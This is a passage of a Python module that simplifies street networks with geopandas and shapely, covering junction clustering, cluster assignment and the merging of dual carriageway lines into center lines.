edges_gdf.loc[edges_gdf['u'].isin(sequence_nodes), 'u'] = new_index \n edges_gdf.loc[edges_gdf['v'].isin(sequence_nodes), 'v'] = new_index \n nodes_gdf.drop(sequence_nodes, axis = 0, inplace = True)\n edges_gdf.drop(sequence_segments, axis = 0, inplace = True) \n if not_a_roundabout:\n break\n if found: \n break\n \n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True) \n \n \n return nodes_gdf, edges_gdf\n \n\ndef identify_clusters(nodes_gdf, edges_gdf, radius = 10): \n \n \"\"\"\n This function simplifies complex junctions as trinagular-like junctions formed mainly by secondary links.\n The junction may be as well represented by one 
node rather than, for example three nodes. \n \n The function takes a node and check whether the intersecting edges give shape to a triangular-cyclic junction.\n \n A new dataframe with the simplified geometries is returned.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n \n Returns\n -------\n GeoDataFrames\n \"\"\" \n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n to_ignore = {k: v for k, v in nodes_degree(edges_gdf).items() if v == 1}\n tmp_nodes_gdf = nodes_gdf[~nodes_gdf.nodeID.isin(list(to_ignore.keys()))].copy() #ignoring dead-ends\n buffered_nodes = tmp_nodes_gdf.buffer(radius).unary_union\n if isinstance(buffered_nodes, Polygon): \n buffered_nodes = [buffered_nodes]\n \n buffered_nodes_geoS = gpd.GeoSeries(list(buffered_nodes))\n buffered_nodes_df = pd.concat([buffered_nodes_geoS.rename('geometry'), pd.Series(buffered_nodes_geoS.index).rename('clusterID')], axis=1)\n\n buffered_nodes_gdf = gpd.GeoDataFrame(buffered_nodes_df, geometry = buffered_nodes_df.geometry)\n buffered_nodes_gdf['area']= buffered_nodes_gdf['geometry'].area\n buffered_nodes_gdf['centroid'] = buffered_nodes_gdf.geometry.centroid\n \n clusters_gdf = buffered_nodes_gdf[buffered_nodes_gdf[\"area\"] > (radius*radius*3.14159)]\n clusters_gdf['x'], clusters_gdf['y'] = (clusters_gdf.geometry.centroid.x, clusters_gdf.geometry.centroid.y)\n clusters_gdf.index += nodes_gdf.index.max()+1\n clusters_gdf['clusterID'] = clusters_gdf.index\n \n # set cluster column values\n nodes_gdf[\"cluster\"] = None\n nodes_gdf[\"cluster\"] = nodes_gdf.apply(lambda row: _assign_cluster_nodes(row[\"geometry\"], clusters_gdf), axis = 1)\n nodes_gdf = nodes_gdf.where(pd.notnull(nodes_gdf), None)\n nodes_gdf.loc[nodes_gdf.nodeID.isin(list(to_ignore.keys())), \"cluster\"] = None\n \n clusters_counts = dict(nodes_gdf['cluster'].value_counts())\n clusters_gdf['degree'] = 0\n clusters_gdf['degree'] = clusters_gdf['clusterID'].map(clusters_counts)\n \n geometry = clusters_gdf['centroid']\n data = clusters_gdf.drop(['centroid', 'geometry'], axis=1)\n clusters_gdf = gpd.GeoDataFrame(data, crs= nodes_gdf.crs, geometry=geometry)\n edges_gdf = _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf)\n \n return(nodes_gdf, edges_gdf, clusters_gdf)\n \ndef _assign_cluster_nodes(node_geometry, clusters_gdf): #ok\n \n ix_geo = clusters_gdf.columns.get_loc(\"geometry\")+1\n ix_cluster = clusters_gdf.columns.get_loc(\"clusterID\")+1\n \n tmp = clusters_gdf[clusters_gdf[\"geometry\"].intersects(node_geometry.buffer(1))]\n if len(tmp) == 0: \n return None\n for cluster in tmp.itertuples():\n if node_geometry.within(cluster[ix_geo]): \n return int(cluster[ix_cluster])\n\ndef _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.set_index('nodeID', drop = False, append = False, inplace = True)\n nodes_gdf.index.name = None\n \n edges_gdf.drop(['nodeID_x', 'nodeID_y','clus_uR', 'clus_vR', 'clus_u', 'clus_v'], axis = 1, inplace = True, errors = 'ignore')\n edges_gdf = pd.merge(edges_gdf, nodes_gdf[['cluster', 'nodeID']], how = 'left', left_on= \"u\", right_on = \"nodeID\")\n edges_gdf = edges_gdf.rename(columns = {'cluster':'clus_u'})\n edges_gdf = pd.merge(edges_gdf, nodes_gdf[['cluster', 'nodeID']], how = 'left', left_on= \"v\", right_on = \"nodeID\")\n edges_gdf = edges_gdf.rename(columns = {'cluster':'clus_v'}) \n 
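# pd.merge returns a freshly indexed frame, so edgeID is restored as the index here\n    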
edges_gdf.set_index('edgeID', drop = False, append = False, inplace = True)\n edges_gdf.index.name = None\n\n edges_gdf['clus_uR'], edges_gdf['clus_vR'] = None, None\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n # assigning cluster\n tmp = edges_gdf[(edges_gdf['clus_u'].isnull())].copy()\n edges_gdf['clus_uR'] = tmp.apply(lambda row: indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, row['edgeID'],\n 'u')[0], axis = 1)\n tmp = edges_gdf[(edges_gdf['clus_v'].isnull())].copy()\n edges_gdf['clus_vR'] = tmp.apply(lambda row: indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, row['edgeID'],\n 'v')[0], axis = 1)\n edges_gdf = edges_gdf.where(pd.notnull(edges_gdf), None)\n edges_gdf.drop(['nodeID_x', 'nodeID_y'], axis = 1, inplace = True, errors = 'ignore') \n return(edges_gdf)\n \ndef indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, ix_line, search_dir, specific_cluster = False, desired_cluster = None):\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n \n u, v = edges_gdf.loc[ix_line]['u'], edges_gdf.loc[ix_line]['v']\n line = edges_gdf.loc[ix_line].geometry\n name = edges_gdf.loc[ix_line]['name']\n line_coords = list(line.coords)\n \n if search_dir == 'v': \n coming_from = v\n other_node = u\n possible_matches = edges_gdf[(edges_gdf.u == v) | (edges_gdf.v == v)].copy()\n else: \n line_coords.reverse()\n coming_from = u\n other_node = v\n possible_matches = edges_gdf[(edges_gdf.u == u) | (edges_gdf.v == u)].copy()\n \n possible_matches.drop(ix_line, axis = 0, inplace = True)\n nodes_traversed = []\n lines_traversed = []\n clusters_traversed = []\n last_line = ix_line\n\n found = False\n distance_start = 0.0\n\n if specific_cluster:\n cluster_geometry = clusters_gdf.loc[desired_cluster].geometry\n distance_start = cluster_geometry.distance(nodes_gdf.loc[coming_from].geometry)\n \n while not found:\n if len(possible_matches) == 0: \n return(None, None, None, None, None, None)\n if specific_cluster:\n if cluster_geometry.distance(nodes_gdf.loc[coming_from].geometry) > distance_start:\n return(None, None, None, None, None, None)\n\n possible_matches.drop(last_line, axis = 0, errors = \"ignore\", inplace = True)\n if len(possible_matches) > 0:\n possible_matches['angle'] = 0.0\n for connector in possible_matches.itertuples():\n angle = angle_line_geometries(edges_gdf.loc[last_line].geometry, connector[ix_geo], deflection = True, degree = True)\n possible_matches.at[connector.Index, 'angle'] = angle\n \n possible_matches.sort_values(by = 'angle', ascending = True, inplace = True) \n \n if len(possible_matches) == 0: \n return(None, None, None, None, None, None) \n for connector in possible_matches.itertuples():\n if not is_continuation(last_line, connector.Index, edges_gdf):\n possible_matches.drop(connector.Index, axis = 0, inplace = True)\n continue\n \n else:\n uCP, vCP = connector[ix_u], connector[ix_v]\n \n if uCP == coming_from:\n cluster = nodes_gdf.loc[vCP].cluster\n coming_from = vCP\n distance_to = nodes_gdf.loc[vCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n distance_from = nodes_gdf.loc[uCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n if (vCP in nodes_traversed) | (distance_to < distance_from):\n possible_matches = possible_matches[0:0]\n 
break\n else: \n cluster = nodes_gdf.loc[uCP].cluster\n coming_from = uCP\n distance_to = nodes_gdf.loc[uCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n distance_from = nodes_gdf.loc[vCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n if (uCP in nodes_traversed) | (distance_to < distance_from):\n possible_matches = possible_matches[0:0]\n break\n \n if (cluster is None) | ((specific_cluster) & (cluster != desired_cluster)):\n lines_traversed.append(connector.Index)\n last_line = connector.Index\n\n if vCP == coming_from:\n possible_matches = edges_gdf[(edges_gdf.u == vCP) | (edges_gdf.v == vCP) ].copy()\n nodes_traversed.append(uCP) \n line_coords = line_coords + list(connector[ix_geo].coords)\n else:\n possible_matches = edges_gdf[(edges_gdf.u == uCP) | (edges_gdf.v == uCP)].copy()\n nodes_traversed.append(vCP)\n tmp = list(connector[ix_geo].coords)\n tmp.reverse()\n line_coords = line_coords + tmp\n if (specific_cluster) & (cluster is not None): \n clusters_traversed.append(cluster)\n break\n \n elif (cluster is not None) | ((specific_cluster) & (cluster == desired_cluster)):\n found = True\n lines_traversed.append(connector.Index)\n \n if vCP == coming_from:\n nodes_traversed.append(uCP)\n last_node = vCP\n line_coords = line_coords + list(connector[ix_geo].coords)\n else: \n nodes_traversed.append(vCP)\n last_node = uCP\n tmp = list(connector[ix_geo].coords)\n tmp.reverse()\n line_coords = line_coords + tmp\n break \n merged_line = LineString([coor for coor in line_coords]) \n if ((len(clusters_traversed) == 0) & (specific_cluster)):\n for n in nodes_traversed:\n if nodes_gdf.loc[n].cluster is not None:\n clusters_traversed.append(nodes_gdf.loc[n].cluster)\n \n return(cluster, merged_line, lines_traversed, nodes_traversed, last_node, clusters_traversed)\n \ndef center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster_from, cluster_to, one_cluster = False): #ok\n \n line_geometry_A = line_geometries[0]\n line_geometry_B = line_geometries[1]\n if line_geometry_A.centroid.distance(line_geometry_B.centroid)> 100: \n return None\n if one_cluster: \n coord_from = (nodes_gdf.loc[cluster_from]['x'], nodes_gdf.loc[cluster_from]['y'])\n else: coord_from = (clusters_gdf.loc[cluster_from]['x'], clusters_gdf.loc[cluster_from]['y'])\n \n coord_to = (clusters_gdf.loc[cluster_to]['x'], clusters_gdf.loc[cluster_to]['y'])\n line_coordsA = list(line_geometry_A.coords)\n line_coordsB = list(line_geometry_B.coords)\n \n # no need to reverse lines, as they should arrive already in the same order \n # different number of vertexes, connect the line\n while len(line_coordsA) > len(line_coordsB):\n index = int(len(line_coordsA)/2)\n del line_coordsA[index]\n while len(line_coordsB) > len(line_coordsA):\n index = int(len(line_coordsB)/2)\n del line_coordsB[index] \n \n new_line = line_coordsA\n for n, i in enumerate(line_coordsA):\n link = LineString([coor for coor in [line_coordsA[n], line_coordsB[n]]])\n np = link.centroid.coords[0] \n new_line[n] = np\n \n new_line[0] = coord_from\n new_line[-1] = coord_to\n center_line = LineString([coor for coor in new_line]) \n \n return center_line\n\ndef split_line_at_interpolation(point, line_geometry): #ok\n \n line_coords = list(line_geometry.coords)\n starting_point = Point(line_coords[0])\n np = nearest_points(point, line_geometry)[1]\n distance_start = line_geometry.project(np)\n \n new_line_A = []\n new_line_B = []\n\n if len(line_coords) == 2:\n new_line_A = [line_coords[0], np.coords[0]]\n new_line_B = [np.coords[0], 
line_coords[-1]]\n line_geometry_A = LineString([coor for coor in new_line_A])\n line_geometry_B = LineString([coor for coor in new_line_B])\n\n else:\n new_line_A.append(line_coords[0])\n new_line_B.append(np.coords[0])\n\n for n, i in enumerate(line_coords):\n if (n == 0) | (n == len(line_coords)-1): \n continue\n if line_geometry.project(Point(i)) < distance_start: \n new_line_A.append(i)\n else: new_line_B.append(i)\n\n new_line_A.append(np.coords[0])\n new_line_B.append(line_coords[-1])\n line_geometry_A = LineString([coor for coor in new_line_A])\n line_geometry_B = LineString([coor for coor in new_line_B])\n \n return((line_geometry_A, line_geometry_B), np)\n \ndef interpolate_on_centre_line(ix_line, center_line, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, \n clusters_gdf = None, clusters_traversed = []):\n \n line_geometry = center_line \n new_index = ix_line \n distances = {}\n \n if len(clusters_traversed)> 0:\n nodes_traversed = nodes_traversed + clusters_traversed\n for node in nodes_traversed:\n if node in clusters_traversed: \n node_geometry = clusters_gdf.loc[node]['geometry']\n else: node_geometry = nodes_gdf.loc[node]['geometry']\n np = nearest_points(node_geometry, center_line)[1]\n distance = center_line.project(np)\n distances[node] = distance \n\n distances_sorted = sorted(distances.items(), key=lambda kv: kv[1]) \n \n for counter, node in enumerate(distances_sorted):\n \n node = distances_sorted[counter][0]\n if node in clusters_traversed: \n point = clusters_gdf.loc[node].geometry\n else: point = nodes_gdf.loc[node].geometry\n result, np = split_line_at_interpolation(point, line_geometry)\n \n if node in clusters_traversed:\n clusters_gdf.at[node, 'x'] = np.coords[0][0]\n clusters_gdf.at[node, 'y'] = np.coords[0][1]\n clusters_gdf.at[node, 'geometry'] = np\n if counter == 0: \n edges_gdf.at[new_index, 'u'] = first_node\n continue\n \n nodes_gdf.at[node, 'x'] = np.coords[0][0]\n nodes_gdf.at[node, 'y'] = np.coords[0][1]\n nodes_gdf.at[node, 'geometry'] = np \n \n #first part of the segment, adjusting node coordinates \n tmp = edges_gdf[(edges_gdf.u == node) | (edges_gdf.v == node)].copy()\n tmp.drop(ix_line, axis = 0, inplace = True, errors = 'ignore')\n \n # for ix, row in tmp.iterrows():\n # tmp_line_coords = list(row['geometry'].coords)\n # if row['u'] == node: tmp_line_coords.insert(1,nodes_gdf.loc[node]['geometry'].coords[0]) \n # if row['v'] == node: tmp_line_coords.insert(-1,nodes_gdf.loc[node]['geometry'].coords[0]) \n # edges_gdf.at[ix, 'geometry'] = LineString([coor for coor in tmp_line_coords])\n \n if counter == 0: \n edges_gdf.at[new_index, 'u'] = first_node\n edges_gdf.at[new_index, 'geometry'] = result[0]\n edges_gdf.at[new_index, 'v'] = node\n edges_gdf.at[new_index, 'new_geo'] = True\n \n # second part of the segment\n new_index = max(edges_gdf.index)+1\n \n edges_gdf.loc[new_index] = edges_gdf.loc[ix_line]\n edges_gdf.at[new_index, 'geometry'] = result[1]\n edges_gdf.at[new_index, 'u'] = node\n edges_gdf.at[new_index, 'v'] = last_node\n edges_gdf.at[new_index, 'edgeID'] = new_index\n edges_gdf.at[new_index, 'new_geo'] = True\n line_geometry = result[1] \n \ndef dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, first_node, last_node, \n nodes_traversed, direction, one_cluster = False, clusters_traversed = []):\n \n ix_lineA = ix_lines[0]\n ix_lineB = ix_lines[1]\n line_geometry_A = line_geometries[0]\n line_geometry_B = line_geometries[1]\n\n interpolation = len(nodes_traversed) > 0\n\n 
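# --- Illustrative sketch, not part of the original module ---
# split_line_at_interpolation above projects an external point onto a line and
# cuts the line in two at that projection. shapely can express the same idea
# compactly with project() plus substring(); a minimal sketch, assuming
# shapely >= 1.7 for shapely.ops.substring:
from shapely.geometry import LineString, Point
from shapely.ops import substring

def sketch_split_at_projection(point, line):
    """Return the two halves of `line`, cut where `point` projects onto it."""
    d = line.project(point)                    # distance along the line
    first = substring(line, 0, d)              # start -> projection
    second = substring(line, d, line.length)   # projection -> end
    return first, second

demo_line = LineString([(0, 0), (10, 0)])
a, b = sketch_split_at_projection(Point(4, 3), demo_line)
# a is LINESTRING (0 0, 4 0); b is LINESTRING (4 0, 10 0).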
if not one_cluster:\n if ((edges_gdf.loc[ix_lineA]['name'] is not None) & (edges_gdf.loc[ix_lineB]['name'] is not None) & \n (edges_gdf.loc[ix_lineA]['name'] != edges_gdf.loc[ix_lineB]['name'])): \n return None\n if ((line_geometry_A.length > line_geometry_B.length*1.50) | (line_geometry_B.length > line_geometry_A.length*1.50)): \n return None\n \n if not one_cluster: \n if (Point(line_geometry_A.coords[0]).distance(Point(line_geometry_A.coords[0])) >\n Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[-1]))):\n dist_SS = Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[-1]))\n dist_EE = Point(line_geometry_A.coords[-1]).distance(Point(line_geometry_B.coords[0]))\n else:\n dist_SS = Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[0]))\n dist_EE = Point(line_geometry_A.coords[-1]).distance(Point(line_geometry_B.coords[-1]))\n \n if (dist_SS > dist_EE*1.50) | (dist_EE > dist_SS*1.50): \n return None\n \n if one_cluster: \n cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, first_node, goal, one_cluster)\n else: cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster, goal)\n if cl is None: \n return None\n \n if (direction == 'u') & (not interpolation):\n line_coords = list(cl.coords)\n line_coords.reverse() \n cl = LineString([coor for coor in line_coords])\n \n if interpolation:\n interpolate_on_centre_line(ix_lineA, cl, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, clusters_gdf, clusters_traversed)\n return 'processed'\n \n edges_gdf.at[ix_lineA, 'new_geo'] = True\n edges_gdf.at[ix_lineA, 'geometry'] = cl\n return 'processed'\n\n\ndef dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, first_node, last_node, \n nodes_traversed, direction, one_cluster = False, clusters_traversed = []):\n \n dict_lines = dict(zip(ix_lines, line_geometries))\n secondary_lines = []\n max_dist = 0\n \n interpolation = len(nodes_traversed) > 0\n \n for line in dict_lines.values():\n for other_line in dict_lines.values():\n if line == other_line: \n continue\n if line.length > other_line.length * 1.50: \n return None \n \n if (len(dict_lines)%2 == 0):\n while len(dict_lines) > 2:\n distances = {}\n for key, line in dict_lines.items():\n cumulative_distance = 0.0\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = mid_point.distance(other_mid_point)\n cumulative_distance += distance\n \n mean_distance = cumulative_distance/len(dict_lines)\n distances[key] = mean_distance\n distances = {k: v for k, v in sorted(distances.items(), key=lambda item: item[1])}\n to_remove = list(distances.keys())[-2:]\n for key in to_remove: \n del dict_lines[key]\n \n line_geometries = list(dict_lines.values())\n \n if one_cluster: \n cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, first_node, goal, one_cluster = True)\n else: cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster, goal)\n \n elif len(dict_lines)%2 != 0: \n \n while len(dict_lines) > 3:\n distances = {}\n for key, line in dict_lines.items():\n cumulative_distance = 0.0\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = 
mid_point.distance(other_mid_point)\n cumulative_distance += distance\n \n mean_distance = cumulative_distance/len(dict_lines)\n distances[key] = mean_distance\n distances = {k: v for k, v in sorted(distances.items(), key=lambda item: item[1])}\n to_remove = list(distances.keys())[-2:]\n for key in to_remove: \n del dict_lines[key]\n\n for key, line in dict_lines.items():\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = mid_point.distance(other_mid_point)\n if distance > max_dist: \n max_dist = distance\n secondary_lines = [key, other_key]\n\n ix_central = [x for x in list(dict_lines.keys()) if x not in secondary_lines][0]\n cl = dict_lines[ix_central]\n \n if (direction == 'u') & (not interpolation):\n line_coords = list(cl.coords)\n line_coords.reverse() \n cl = LineString([coor for coor in line_coords])\n\n if interpolation:\n interpolate_on_centre_line(ix_lines[0], cl, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, clusters_gdf, clusters_traversed) \n else: \n edges_gdf.at[ix_lines[0], 'geometry'] = cl\n edges_gdf.at[ix_lines[0], 'new_geo'] = True\n \n return 'processed' \n \ndef is_possible_dual(ix_lineA, ix_lineB, edges_gdf, processed, one_cluster = False):\n \n line_geometry_A = edges_gdf.loc[ix_lineA].geometry\n line_geometry_B = edges_gdf.loc[ix_lineB].geometry\n \n if ix_lineB in processed: \n return False\n if not one_cluster:\n if ((edges_gdf.loc[ix_lineA].u == edges_gdf.loc[ix_lineB].u) | (edges_gdf.loc[ix_lineA].u == edges_gdf.loc[ix_lineB].v)\n | (edges_gdf.loc[ix_lineA].v == edges_gdf.loc[ix_lineB].u) | (edges_gdf.loc[ix_lineA].v == edges_gdf.loc[ix_lineB].v)): \n return False\n if not is_parallel(line_geometry_A, line_geometry_B, hard = True): \n return False\n else: \n if is_continuation(ix_lineA, ix_lineB, edges_gdf): \n return False\n\n return True\n \n\ndef simplify_dual_lines(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.index, edges_gdf.index, clusters_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID, clusters_gdf.clusterID\n nodes_gdf.index.name, edges_gdf.index.name, clusters_gdf.index.name = None, None, None\n nodes_gdf, edges_gdf, clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n ################################ FROM NODES TO CLUSTERED JUNCTIONS\n \n clusters_gdf['keep'] = False\n edges_gdf['new_geo'] = False\n edges_gdf['forced_cluster'] = False\n original_nodes_gdf, original_edges_gdf, original_clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n processed = []\n to_drop = []\n \n \n print('Simplifying dual lines: First part - clusters')\n clusters_gdf.sort_values(by = 'degree', ascending = False, inplace = True)\n list_cluster = clusters_gdf.index.values.tolist() \n \n for cluster in list_cluster:\n edges_tmp = original_edges_gdf[((original_edges_gdf.clus_u == cluster) | (original_edges_gdf.clus_v == cluster))].copy()\n edges_tmp = edges_tmp[edges_tmp.clus_u != 
edges_tmp.clus_v].copy()\n edges_tmp.sort_values(by = 'length', ascending = False, inplace = True)\n if len(edges_tmp) == 1: \n continue\n\n for road in edges_tmp.itertuples(): \n if road.Index in processed: \n continue\n possible_dual_lines = edges_tmp.copy() \n edges_gdf['forced_cluster'] = False\n \n # disregard unparallel lines \n possible_dual_lines['candidate'] = True\n possible_dual_lines['candidate'] = possible_dual_lines.apply(lambda r: is_possible_dual(road.Index, r['edgeID'], original_edges_gdf, \n processed), axis = 1)\n possible_dual_lines.at[road.Index, 'candidate' ] = True\n possible_dual_lines = possible_dual_lines[possible_dual_lines.candidate]\n if len(possible_dual_lines) < 2: \n continue\n possible_dual_lines['dir'] = 'v'\n\n # orientate everything from \"u\" to \"v\" in relation to the cluster\n for candidate in possible_dual_lines.itertuples():\n if candidate[ix_clus_v] == cluster:\n line_coords = list(candidate[ix_geo].coords)\n line_coords.reverse() \n new_line_geometry = LineString([coor for coor in line_coords])\n old_u = candidate[ix_u]\n old_clus_u, old_clus_uR = candidate[ix_clus_u], candidate[ix_clus_uR]\n \n possible_dual_lines.at[candidate.Index,'geometry'] = new_line_geometry\n possible_dual_lines.at[candidate.Index,'u'] = candidate[ix_v]\n possible_dual_lines.at[candidate.Index,'v'] = old_u\n possible_dual_lines.at[candidate.Index,'clus_u'] = candidate[ix_clus_v]\n possible_dual_lines.at[candidate.Index,'clus_v'] = old_clus_u\n possible_dual_lines.at[candidate.Index,'clus_uR'] = candidate[ix_clus_vR]\n possible_dual_lines.at[candidate.Index,'clus_vR'] = old_clus_uR\n possible_dual_lines.at[candidate.Index, 'dir'] = 'u' # indicates original dir\n \n # does the line considered in the loop reach a cluster? if not straight away, at some point? 
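# --- Illustrative sketch, not part of the original module ---
# The dual-line merges performed in this loop ultimately rely on
# center_line_cluster (defined earlier), which trims two roughly parallel
# polylines to the same vertex count and then averages each vertex pair.
# The core of that computation, reduced to plain shapely (helper name is
# hypothetical):
from shapely.geometry import LineString

def sketch_center_line(line_a, line_b):
    """Average two polylines into one center line, vertex by vertex."""
    coords_a, coords_b = list(line_a.coords), list(line_b.coords)
    # Drop middle vertices from the denser line until the counts match,
    # mirroring the trimming loop in center_line_cluster.
    while len(coords_a) > len(coords_b):
        del coords_a[len(coords_a) // 2]
    while len(coords_b) > len(coords_a):
        del coords_b[len(coords_b) // 2]
    mid = [((xa + xb) / 2.0, (ya + yb) / 2.0)
           for (xa, ya), (xb, yb) in zip(coords_a, coords_b)]
    return LineString(mid)

# Two parallel carriageways 2 units apart collapse onto the axis between them:
# sketch_center_line(LineString([(0, 0), (10, 0)]),
#                    LineString([(0, 2), (10, 2)]))  -> LINESTRING (0 1, 10 1)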
\n if possible_dual_lines.loc[road.Index]['clus_v'] is not None: \n goal = possible_dual_lines.loc[road.Index]['clus_v']\n else: goal = possible_dual_lines.loc[road.Index]['clus_vR']\n if (goal is None) | (goal == cluster): \n continue\n \n for candidate in possible_dual_lines.itertuples():\n \n if candidate[ix_clus_v] is not None: \n secondary_goal = candidate[ix_clus_v]\n else: secondary_goal = candidate[ix_clus_vR]\n if secondary_goal != goal: \n direction = possible_dual_lines.at[candidate.Index, 'dir']\n forced_cluster = indirect_cluster(original_nodes_gdf, original_edges_gdf, original_clusters_gdf, candidate.Index, direction, \n specific_cluster = True, desired_cluster = goal)[0] \n if forced_cluster == goal:\n possible_dual_lines.at[candidate.Index, 'forced_cluster'] = True\n possible_dual_lines.at[candidate.Index, 'clus_vR'] = forced_cluster\n possible_dual_lines.at[candidate.Index, 'clus_v'] = None\n else: possible_dual_lines.drop(candidate.Index, axis = 0, inplace = True)\n \n done = False\n lines_traversed = []\n if len(possible_dual_lines) == 1: \n continue # no parallel streets to row.Index \n \n\n line_geometries = [possible_dual_lines.iloc[i]['geometry'] for i in range(0, len(possible_dual_lines))] \n ix_lines = [possible_dual_lines.iloc[i].edgeID for i in range(0, len(possible_dual_lines))] \n c_u = [possible_dual_lines.iloc[i]['clus_u'] for i in range(0, len(possible_dual_lines))]\n c_v = [possible_dual_lines.iloc[i]['clus_v'] for i in range(0, len(possible_dual_lines))]\n u = [possible_dual_lines.iloc[i]['u'] for i in range(0, len(possible_dual_lines))] \n v = [possible_dual_lines.iloc[i]['v'] for i in range(0, len(possible_dual_lines))]\n forced_cluster = [possible_dual_lines.iloc[i]['forced_cluster'] for i in range(0, len(possible_dual_lines))]\n drs = [possible_dual_lines.iloc[i]['dir'] for i in range(0, len(possible_dual_lines))] \n list_nodes_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_lines_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_clusters_traversed = [[] for i in range(0, len(possible_dual_lines))] \n last_node, nodes_traversed, lines_traversed, clusters_traversed = None, [], [], []\n \n ######################################################## \n ## OPTION 1: they all reach another cluster:\n\n if all(x == c_v[0] for x in c_v) & (not None in c_v):\n if len(possible_dual_lines) == 2:\n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node,\n nodes_traversed, drs[0])\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], \n last_node, nodes_traversed, drs[0])\n if merged is None: \n continue \n done = True\n \n ######################################################## \n ## OPTION 2: at least one does not reach the cluster: \n \n elif None in c_v:\n # pre-check \n if len(possible_dual_lines) > 2:\n all_checked = False\n \n while not all_checked:\n all_checked = True\n for n, line in enumerate(line_geometries):\n for nn, other_line in enumerate(line_geometries):\n if n >= nn : \n continue\n if ((line.coords[0] == other_line.coords[0]) | (line.coords[0] == other_line.coords[-1]) |\n (line.coords[-1] == other_line.coords[0]) | (line.coords[-1] == other_line.coords[-1])):\n if line.length > other_line.length: \n to_remove = n\n elif line.length < other_line.length: \n to_remove = nn\n else: continue\n for ll in [c_u, c_v, u, v, drs, line_geometries, ix_lines, 
list_nodes_traversed, list_lines_traversed, \n list_clusters_traversed, forced_cluster]: \n del ll[to_remove]\n all_checked = False\n break\n if not all_checked: \n break\n \n if len(ix_lines) < 2: \n continue\n \n for n, c in enumerate(c_v):\n specific_cluster, desired_cluster = False, None\n if c is None:\n if forced_cluster[n]:\n specific_cluster = True\n desired_cluster = goal\n \n _, line_geometries[n], list_lines_traversed[n], list_nodes_traversed[n], last_node, list_clusters_traversed[n] = indirect_cluster(\n original_nodes_gdf, original_edges_gdf, original_clusters_gdf, ix_lines[n], drs[n], specific_cluster = specific_cluster, \n desired_cluster = desired_cluster)\n \n if len(possible_dual_lines) > 2:\n all_checked = False\n \n while not all_checked:\n all_checked = True\n for n, i in enumerate(list_lines_traversed):\n for nn, ii in enumerate(list_lines_traversed):\n if n >= nn: \n continue \n if len(list(set(i).intersection(ii))) > 0: \n for ll in [c_u, c_v, u, v, drs, line_geometries, ix_lines, list_nodes_traversed, list_lines_traversed,\n list_clusters_traversed, forced_cluster]: \n del ll[nn]\n all_checked = False\n break\n if not all_checked: \n break\n\n if len(ix_lines) < 2: \n continue\n \n # last node does not matter, as it will be reassigned to the relative 